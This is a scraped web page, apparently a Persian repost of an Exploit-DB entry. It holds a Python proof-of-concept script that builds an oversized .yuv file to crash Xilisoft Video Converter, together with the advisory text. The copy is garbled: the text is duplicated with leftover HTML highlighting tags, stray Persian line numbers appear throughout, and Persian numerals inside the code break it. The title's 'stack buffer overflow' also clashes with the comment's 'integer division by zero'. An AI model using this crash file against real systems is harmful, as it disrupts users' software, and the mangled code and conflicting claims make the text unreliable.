Xilisoft Video Converter Wizard – ‘.yuv’ Stack Buffer Overflow

source<span class="token punctuation">:</span> http<span class="token punctuation">:</span><span class="token operator">//</span>www<span class="token punctuation">.</span>securityfocus<span class="token punctuation">.</span>com<span class="token operator">/</span>bid<span class="token operator">/</span><span class="token number">38854</span><span class="token operator">/</span>info

Xilisoft Video Converter <span class="token keyword">is</span> prone to a stack<span class="token operator">-</span>based <span class="token builtin">buffer</span><span class="token operator">-</span>overflow vulnerability because the application fails to perform adequate boundary checks on user<span class="token operator">-</span>supplied <span class="token builtin">input</span><span class="token punctuation">.</span>

Attackers may leverage this issue to execute arbitrary code <span class="token keyword">in</span> the context of the application<span class="token punctuation">.</span> Failed attacks will cause denial<span class="token operator">-</span>of<span class="token operator">-</span>service conditions<span class="token punctuation">.</span>

<span class="token comment">#! /usr/bin/python</span>
<span class="token comment">#</span>
<span class="token comment"># Xilisoft Video Converter(.yuv file) Stack buffer Overflow Poc</span>
<span class="token comment"># Homepage: www.xilisoft.com</span>
<span class="token comment"># #############################################################################</span>
<span class="token comment"># Credit : ItSecTeam</span>
<span class="token comment"># mail : Bug@ItSecTeam.com</span>
<span class="token comment"># Web:  WwW.ITSecTeam.com</span>
<span class="token comment"># Forum: WwW.forum.itsecteam.com</span>
<span class="token comment"># Exploit Coded by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam</span>
<span class="token comment"># Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder</span>
<span class="token comment"># #############################################################################</span>
<span class="token comment"># Bug: Integer Division By Zero</span>
<span class="token comment"># Tested in : Windows XP SP3 EN</span>
<span class="token comment"># Tested version : 3   = Crash</span>
<span class="token comment"># Usage: ./Xilisoft-poc.py</span>
<span class="token comment"># #############################################################################</span>
<span class="token comment"># 102DFDAB: Integer divide by zero (exc.code c0000094, tid 2908)</span>
<span class="token comment"># EAX 00000000  ECX 00000000 EBX 00000001 ESP 000E629C EBP 025B3270</span>
<span class="token comment"># ESI 00000000 EDI 00000000 EIP 102DFDAB avcodec.102DFDAB</span>
 
<span class="token keyword">try</span><span class="token punctuation">:</span>
        <span class="token builtin">file</span><span class="token operator">=</span><span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"Xilisoft-poc.yuv"</span><span class="token punctuation">,</span><span class="token string">'w'</span><span class="token punctuation">)</span>
        Buff <span class="token operator">=</span> <span class="token string">"\x41"</span> <span class="token operator">*</span><span class="token number">500000</span>
        <span class="token builtin">file</span><span class="token punctuation">.</span>write<span class="token punctuation">(</span> Buff <span class="token punctuation">)</span>
        <span class="token builtin">file</span><span class="token punctuation">.</span>close<span class="token punctuation">(</span><span class="token punctuation">)</span>
        <span class="token keyword">print</span>   <span class="token punctuation">(</span><span class="token string">"[+] File created successfully: Xilisoft-poc.yuv"</span> <span class="token punctuation">)</span>
<span class="token keyword">except</span><span class="token punctuation">:</span>
        <span class="token keyword">print</span> <span class="token string">"[-] Error cant write file to system\n"</span>

۱۰

۱۱

۱۲

۱۳

۱۴

۱۵

۱۶

۱۷

۱۸

۱۹

۲۰

۲۱

۲۲

۲۳

۲۴

۲۵

۲۶

۲۷

۲۸

۲۹

۳۰

۳۱

۳۲

۳۳

۳۴

۳۵

source: http://www.securityfocus.com/bid/38854/info

Xilisoft Video Converter is prone to a stack-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied input.

Attackers may leverage this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions.

#! /usr/bin/python

#

# Xilisoft Video Converter(.yuv file) Stack buffer Overflow Poc

# Homepage: www.xilisoft.com

# #############################################################################

# Credit : ItSecTeam

# mail : Bug@ItSecTeam.com

# Web: WwW.ITSecTeam.com

# Forum: WwW.forum.itsecteam.com

# Exploit Coded by: hoshang jafari a.k.a (PLATEN) @ ItSecTeam

# Special Tanks : M3hr@n.S - B3hz4d - Cdef3nder

# #############################################################################

# Bug: Integer Division By Zero

# Tested in : Windows XP SP3 EN

# Tested version : 3 = Crash

# Usage: ./Xilisoft-poc.py

# #############################################################################

# ۱۰۲DFDAB: Integer divide by zero (exc.code c0000094, tid 2908)

# EAX 00000000 ECX 00000000 EBX 00000001 ESP 000E629C EBP 025B3270

# ESI 00000000 EDI 00000000 EIP 102DFDAB avcodec.102DFDAB

try:

file=open("Xilisoft-poc.yuv",'w')

Buff = "\x41" *۵۰۰۰۰۰

file.write( Buff )

file.close()

print ("[+] File created successfully: Xilisoft-poc.yuv" )

except:

print "[-] Error cant write file to system\n"

منبع: https://www.exploit-db.com/exploits/33775

اطلاعات پروژه

دسته: آسیب پذیری های امنیتی
Status :
مشتری :
تاریخ: ۱۱/۱۰/۱۳۹۷
برچسب ها : آسیب پذیری های امنیتی